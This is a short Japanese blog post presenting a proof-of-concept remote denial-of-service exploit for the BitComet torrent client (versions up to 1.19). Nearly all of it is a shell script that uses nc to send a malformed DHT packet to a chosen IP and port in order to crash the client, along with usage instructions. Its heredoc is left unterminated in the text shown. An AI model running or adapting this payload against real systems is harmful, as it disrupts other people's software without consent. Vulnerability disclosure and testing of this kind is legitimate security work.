金曜日, 4月 09, 2010

Bitcomet(Torrentクライアント)DoSのPoC

下記BitcometバグのPoCとなります、DHT packetハンドルのバグでDoS状態の再現が出来ます。
------
#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
#
# Description:
# Affected versions :
# BitComet <= 1.19
#
# Platforms :
# Windows
#
# Usage :
# ./exploit.sh ip port

if [ $# -ne 2 ]; then
echo "./exploit.sh ip port"
exit 1
fi

nc -u $1 $2 << .
d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee
----
unixfreaxjp

0 件のコメント:

コメントを投稿